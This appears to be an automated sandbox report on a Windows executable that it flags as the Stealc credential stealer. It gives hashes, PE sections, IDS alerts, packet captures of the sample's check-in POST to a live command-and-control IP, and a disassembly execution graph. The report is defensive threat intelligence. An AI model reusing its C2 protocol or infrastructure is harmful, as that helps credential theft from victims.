                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.215.113.206file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/68b591d6548ec281/sqlite3.dll
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/c4becf79229cb002.php
                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                  • 185.215.113.206/c4becf79229cb002.php

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 13.107.246.45
                                  E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                  • 13.107.246.45
                                  https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.45
                                  17321442093b7efcab383e800ce7d48a843c02e132542886b8b8918e7e8cfcc51ec7dd418b419.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.45
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 13.107.246.45

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousAmadeyBrowse
                                  • 185.215.113.43

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.946866146790984
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'821'184 bytes
                                  MD5:3b43c7942554833f316cf7108b571f8b
                                  SHA1:f6f15b0a739eac16980144cbc1b7e2579fe9141a
                                  SHA256:a782058a0f3fe32eddc56aa22a302f5c1d7f718e434cf2c547336ace69a680e2
                                  SHA512:f12e5b6a73c6c75a1641b31446aac4111d1326b6186f9b3a70b4527256f6f4a9325382daedd89524afc2f4137536a8e6350849a18a9da769ddb834e85c7b0226
                                  SSDEEP:49152:CCRt5JhpnWwiPQ1+xLwj6oNWuJ/syBrFXVz:dRvJh1tiPs+xEJF5Brb
                                  TLSH:D2853320AB336A78CBBD2A35658E3493377817912C86E4B57F0C9FFB6C83C6501558AD
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xaa2000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007FB5609D8DDAh
                                  push gs
                                  sbb eax, dword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007FB5609DADD5h
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop ds
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax+00000000h], eax
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2490000x1620043ddbdbe830b3365fc5cc31398bfd18bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x24a0000x1ac0x2007af6a1921167553d54e95ce147c038caFalse0.578125data4.552153357454123IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x24c0000x2b20000x200bbd63fa5b49c742d63f6d5be50f52674unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  rkukuayu0x4fe0000x1a30000x1a2c004ea1fed79c9e4f384b5343d4a1f0e182False0.9949271222014925data7.955051436363669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  uvxbkdjf0x6a10000x10000x400fb9360c0b9df1f677f9f31b185a09decFalse0.75data5.978888106086439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x6a20000x30000x2200666fd6fa0fab38c1638828fc7bf0da37False0.06192555147058824DOS executable (COM)0.7469734626345014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_MANIFEST0x6a08d40x152ASCII text, with CRLF line terminators0.6479289940828402

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-11-21T06:23:15.183425+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 21, 2024 06:23:12.974828005 CET4970480192.168.2.5185.215.113.206
                                  Nov 21, 2024 06:23:13.094888926 CET8049704185.215.113.206192.168.2.5
                                  Nov 21, 2024 06:23:13.095067978 CET4970480192.168.2.5185.215.113.206
                                  Nov 21, 2024 06:23:13.095531940 CET4970480192.168.2.5185.215.113.206
                                  Nov 21, 2024 06:23:13.215898991 CET8049704185.215.113.206192.168.2.5
                                  Nov 21, 2024 06:23:14.529508114 CET8049704185.215.113.206192.168.2.5
                                  Nov 21, 2024 06:23:14.529580116 CET4970480192.168.2.5185.215.113.206
                                  Nov 21, 2024 06:23:14.715358019 CET4970480192.168.2.5185.215.113.206
                                  Nov 21, 2024 06:23:14.834949017 CET8049704185.215.113.206192.168.2.5
                                  Nov 21, 2024 06:23:15.183262110 CET8049704185.215.113.206192.168.2.5
                                  Nov 21, 2024 06:23:15.183424950 CET4970480192.168.2.5185.215.113.206
                                  Nov 21, 2024 06:23:17.990291119 CET4970480192.168.2.5185.215.113.206

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Nov 21, 2024 06:23:22.383482933 CET1.1.1.1192.168.2.50x1d44No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                  Nov 21, 2024 06:23:22.383482933 CET1.1.1.1192.168.2.50x1d44No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.206803668C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Nov 21, 2024 06:23:13.095531940 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Nov 21, 2024 06:23:14.529508114 CET203INHTTP/1.1 200 OK
                                  Date: Thu, 21 Nov 2024 05:23:14 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Nov 21, 2024 06:23:14.715358019 CET412OUTPOST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJE
                                  Host: 185.215.113.206
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 37 32 39 38 32 30 37 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a
                                  Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"24729820740F807656615------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"mars------AAKJKJDGCGDBGDHIJKJE--
                                  Nov 21, 2024 06:23:15.183262110 CET210INHTTP/1.1 200 OK
                                  Date: Thu, 21 Nov 2024 05:23:14 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:00:23:08
                                  Start date:21/11/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xa0000
                                  File size:1'821'184 bytes
                                  MD5 hash:3B43C7942554833F316CF7108B571F8B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:16.5%
                                    Total number of Nodes:1411
                                    Total number of Limit Nodes:28
                                    execution_graph 27183 b8c88 16 API calls 27211 ab309 98 API calls 27170 a100e GetCurrentProcess VirtualAllocExNuma ExitProcess VirtualAlloc VirtualFree 27212 a7702 free ctype 27184 c2880 10 API calls 27185 c4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27186 c3480 6 API calls 27208 c3280 7 API calls 27228 b8615 47 API calls 27187 c749e 7 API calls ctype 27188 b2499 290 API calls 27229 adb99 674 API calls 27172 c8819 5 API calls _raise 27194 c4e35 10 API calls 27173 c2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27214 c9711 133 API calls __setmbcp 27215 b4b29 303 API calls 27230 b23a9 298 API calls 27205 a8e20 strlen malloc strcpy_s free std::exception::exception 27190 c30a0 GetSystemPowerStatus 27200 c29a0 GetCurrentProcess IsWow64Process 27206 af639 144 API calls 27209 a16b9 200 API calls 27217 abf39 177 API calls 27231 babb2 120 API calls 27195 c3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27232 b8615 48 API calls 27174 be049 147 API calls 27191 c3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27220 b8615 49 API calls 27233 c33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27221 c735d strlen strlen malloc strcpy_s 27197 b3959 244 API calls 27201 b01d9 126 API calls 27192 c2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27176 c2853 lstrcpy 27207 b1269 408 API calls 27177 a5869 57 API calls 27199 c2d60 11 API calls 27223 ca280 __CxxFrameHandler 27224 c2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27193 be0f9 140 API calls 27225 b6b79 138 API calls 27179 a8c79 strlen malloc strcpy_s 27210 bf2f8 93 API calls 27226 a1b64 162 API calls 27234 abbf9 90 API calls 25733 c1bf0 25785 a2a90 25733->25785 25737 c1c03 25738 c1c29 lstrcpy 25737->25738 25739 c1c35 25737->25739 25738->25739 25740 c1c6d GetSystemInfo 25739->25740 25741 c1c65 ExitProcess 25739->25741 25742 c1c7d ExitProcess 25740->25742 25743 c1c85 25740->25743 25886 a1030 GetCurrentProcess VirtualAllocExNuma 25743->25886 25748 c1cb8 25898 c2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25748->25898 25749 c1ca2 25749->25748 25750 c1cb0 ExitProcess 25749->25750 25752 c1cbd 25753 c1ce7 lstrlen 25752->25753 26107 c2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25752->26107 25757 c1cff 25753->25757 25755 c1cd1 25755->25753 25759 c1ce0 ExitProcess 25755->25759 25756 c1d23 lstrlen 25758 c1d39 25756->25758 25757->25756 25760 c1d13 lstrcpy lstrcat 25757->25760 25761 c1d5a 25758->25761 25763 c1d46 lstrcpy lstrcat 25758->25763 25760->25756 25762 c2ad0 3 API calls 25761->25762 25764 c1d5f lstrlen 25762->25764 25763->25761 25766 c1d74 25764->25766 25765 c1d9a lstrlen 25767 c1db0 25765->25767 25766->25765 25768 c1d87 lstrcpy lstrcat 25766->25768 25769 c1dce 25767->25769 25770 c1dba lstrcpy lstrcat 25767->25770 25768->25765 25900 c2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25769->25900 25770->25769 25772 c1dd3 lstrlen 25773 c1de7 25772->25773 25774 c1df7 lstrcpy lstrcat 25773->25774 25775 c1e0a 25773->25775 25774->25775 25776 c1e28 lstrcpy 25775->25776 25777 c1e30 25775->25777 25776->25777 25778 c1e56 OpenEventA 25777->25778 25779 c1e8c CreateEventA 25778->25779 25780 c1e68 CloseHandle Sleep OpenEventA 25778->25780 25901 c1b20 GetSystemTime 25779->25901 25780->25779 25780->25780 25784 c1ea5 CloseHandle ExitProcess 26108 a4a60 25785->26108 25787 a2aa1 25788 a4a60 2 API calls 25787->25788 25789 a2ab7 25788->25789 25790 a4a60 2 API calls 25789->25790 25791 a2acd 25790->25791 25792 a4a60 2 API calls 25791->25792 25793 a2ae3 25792->25793 25794 a4a60 2 API calls 25793->25794 25795 a2af9 25794->25795 25796 a4a60 2 API calls 25795->25796 25797 a2b0f 25796->25797 25798 a4a60 2 API calls 25797->25798 25799 a2b28 25798->25799 25800 a4a60 2 API calls 25799->25800 25801 a2b3e 25800->25801 25802 a4a60 2 API calls 25801->25802 25803 a2b54 25802->25803 25804 a4a60 2 API calls 25803->25804 25805 a2b6a 25804->25805 25806 a4a60 2 API calls 25805->25806 25807 a2b80 25806->25807 25808 a4a60 2 API calls 25807->25808 25809 a2b96 25808->25809 25810 a4a60 2 API calls 25809->25810 25811 a2baf 25810->25811 25812 a4a60 2 API calls 25811->25812 25813 a2bc5 25812->25813 25814 a4a60 2 API calls 25813->25814 25815 a2bdb 25814->25815 25816 a4a60 2 API calls 25815->25816 25817 a2bf1 25816->25817 25818 a4a60 2 API calls 25817->25818 25819 a2c07 25818->25819 25820 a4a60 2 API calls 25819->25820 25821 a2c1d 25820->25821 25822 a4a60 2 API calls 25821->25822 25823 a2c36 25822->25823 25824 a4a60 2 API calls 25823->25824 25825 a2c4c 25824->25825 25826 a4a60 2 API calls 25825->25826 25827 a2c62 25826->25827 25828 a4a60 2 API calls 25827->25828 25829 a2c78 25828->25829 25830 a4a60 2 API calls 25829->25830 25831 a2c8e 25830->25831 25832 a4a60 2 API calls 25831->25832 25833 a2ca4 25832->25833 25834 a4a60 2 API calls 25833->25834 25835 a2cbd 25834->25835 25836 a4a60 2 API calls 25835->25836 25837 a2cd3 25836->25837 25838 a4a60 2 API calls 25837->25838 25839 a2ce9 25838->25839 25840 a4a60 2 API calls 25839->25840 25841 a2cff 25840->25841 25842 a4a60 2 API calls 25841->25842 25843 a2d15 25842->25843 25844 a4a60 2 API calls 25843->25844 25845 a2d2b 25844->25845 25846 a4a60 2 API calls 25845->25846 25847 a2d44 25846->25847 25848 a4a60 2 API calls 25847->25848 25849 a2d5a 25848->25849 25850 a4a60 2 API calls 25849->25850 25851 a2d70 25850->25851 25852 a4a60 2 API calls 25851->25852 25853 a2d86 25852->25853 25854 a4a60 2 API calls 25853->25854 25855 a2d9c 25854->25855 25856 a4a60 2 API calls 25855->25856 25857 a2db2 25856->25857 25858 a4a60 2 API calls 25857->25858 25859 a2dcb 25858->25859 25860 a4a60 2 API calls 25859->25860 25861 a2de1 25860->25861 25862 a4a60 2 API calls 25861->25862 25863 a2df7 25862->25863 25864 a4a60 2 API calls 25863->25864 25865 a2e0d 25864->25865 25866 a4a60 2 API calls 25865->25866 25867 a2e23 25866->25867 25868 a4a60 2 API calls 25867->25868 25869 a2e39 25868->25869 25870 a4a60 2 API calls 25869->25870 25871 a2e52 25870->25871 25872 c6390 GetPEB 25871->25872 25873 c65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25872->25873 25874 c63c3 25872->25874 25875 c6638 25873->25875 25876 c6625 GetProcAddress 25873->25876 25881 c63d7 20 API calls 25874->25881 25877 c666c 25875->25877 25878 c6641 GetProcAddress GetProcAddress 25875->25878 25876->25875 25879 c6688 25877->25879 25880 c6675 GetProcAddress 25877->25880 25878->25877 25882 c66a4 25879->25882 25883 c6691 GetProcAddress 25879->25883 25880->25879 25881->25873 25884 c66ad GetProcAddress GetProcAddress 25882->25884 25885 c66d7 25882->25885 25883->25882 25884->25885 25885->25737 25887 a105e VirtualAlloc 25886->25887 25888 a1057 ExitProcess 25886->25888 25889 a107d 25887->25889 25890 a108a VirtualFree 25889->25890 25891 a10b1 25889->25891 25890->25891 25892 a10c0 25891->25892 25893 a10d0 GlobalMemoryStatusEx 25892->25893 25895 a1112 ExitProcess 25893->25895 25896 a10f5 25893->25896 25896->25895 25897 a111a GetUserDefaultLangID 25896->25897 25897->25748 25897->25749 25899 c2b24 25898->25899 25899->25752 25900->25772 26113 c1820 25901->26113 25903 c1b81 sscanf 26152 a2a20 25903->26152 25906 c1be9 25909 bffd0 25906->25909 25907 c1bd6 25907->25906 25908 c1be2 ExitProcess 25907->25908 25910 bffe0 25909->25910 25911 c000d lstrcpy 25910->25911 25912 c0019 lstrlen 25910->25912 25911->25912 25913 c00d0 25912->25913 25914 c00db lstrcpy 25913->25914 25915 c00e7 lstrlen 25913->25915 25914->25915 25916 c00ff 25915->25916 25917 c010a lstrcpy 25916->25917 25918 c0116 lstrlen 25916->25918 25917->25918 25919 c012e 25918->25919 25920 c0139 lstrcpy 25919->25920 25921 c0145 25919->25921 25920->25921 26154 c1570 25921->26154 25924 c016e 25925 c018f lstrlen 25924->25925 25926 c0183 lstrcpy 25924->25926 25927 c01a8 25925->25927 25926->25925 25928 c01bd lstrcpy 25927->25928 25929 c01c9 lstrlen 25927->25929 25928->25929 25930 c01e8 25929->25930 25931 c020c lstrlen 25930->25931 25932 c0200 lstrcpy 25930->25932 25933 c026a 25931->25933 25932->25931 25934 c0282 lstrcpy 25933->25934 25935 c028e 25933->25935 25934->25935 26164 a2e70 25935->26164 25943 c0540 25944 c1570 4 API calls 25943->25944 25945 c054f 25944->25945 25946 c05a1 lstrlen 25945->25946 25947 c0599 lstrcpy 25945->25947 25948 c05bf 25946->25948 25947->25946 25949 c05d1 lstrcpy lstrcat 25948->25949 25950 c05e9 25948->25950 25949->25950 25951 c0614 25950->25951 25952 c060c lstrcpy 25950->25952 25953 c061b lstrlen 25951->25953 25952->25951 25954 c0636 25953->25954 25955 c064a lstrcpy lstrcat 25954->25955 25956 c0662 25954->25956 25955->25956 25957 c0687 25956->25957 25958 c067f lstrcpy 25956->25958 25959 c068e lstrlen 25957->25959 25958->25957 25960 c06b3 25959->25960 25961 c06c7 lstrcpy lstrcat 25960->25961 25962 c06db 25960->25962 25961->25962 25963 c0704 lstrcpy 25962->25963 25964 c070c 25962->25964 25963->25964 25965 c0749 lstrcpy 25964->25965 25966 c0751 25964->25966 25965->25966 26920 c2740 GetWindowsDirectoryA 25966->26920 25968 c0785 26929 a4c50 25968->26929 25969 c075d 25969->25968 25970 c077d lstrcpy 25969->25970 25970->25968 25972 c078f 27083 b8ca0 StrCmpCA 25972->27083 25974 c079b 25975 a1530 8 API calls 25974->25975 25976 c07bc 25975->25976 25977 c07ed 25976->25977 25978 c07e5 lstrcpy 25976->25978 27101 a60d0 80 API calls 25977->27101 25978->25977 25980 c07fa 27102 b81b0 10 API calls 25980->27102 25982 c0809 25983 a1530 8 API calls 25982->25983 25984 c082f 25983->25984 25985 c085e 25984->25985 25986 c0856 lstrcpy 25984->25986 27103 a60d0 80 API calls 25985->27103 25986->25985 25988 c086b 27104 b7ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25988->27104 25990 c0876 25991 a1530 8 API calls 25990->25991 25992 c08a1 25991->25992 25993 c08c9 lstrcpy 25992->25993 25994 c08d5 25992->25994 25993->25994 27105 a60d0 80 API calls 25994->27105 25996 c08db 27106 b8050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25996->27106 25998 c08e6 25999 a1530 8 API calls 25998->25999 26000 c08f7 25999->26000 26001 c092e 26000->26001 26002 c0926 